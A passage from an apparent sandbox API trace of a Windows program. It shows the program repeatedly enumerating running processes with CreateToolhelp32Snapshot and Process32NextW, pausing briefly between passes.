(in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.752] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.753] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0208.753] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.754] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.755] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.756] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.756] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.756] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0208.756] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0208.757] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.757] Process32NextW (in: hSnapshot=0xf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0208.757] Sleep (dwMilliseconds=0x64) [0209.006] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf8 [0209.010] Process32FirstW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.011] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.014] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.016] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.016] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.016] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.017] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.017] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.017] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.017] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.018] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.018] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.018] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.021] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.021] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.021] Process32NextW (in: hSnapshot=0xf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.022] Sleep (dwMilliseconds=0x64) [0209.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xfc [0209.147] Process32FirstW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.148] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.148] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.148] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.149] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.149] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.149] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.149] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.150] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.150] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.150] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.151] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.151] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.151] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.151] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.152] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.152] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.152] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.153] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.153] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.153] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.153] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.154] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.154] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.154] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.154] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.155] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.155] Process32NextW (in: hSnapshot=0xfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.155] Sleep (dwMilliseconds=0x64) [0209.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x100 [0209.340] Process32FirstW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.340] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.341] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.341] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.341] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.341] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.342] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.342] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.342] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.343] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.343] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.343] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.344] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.344] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 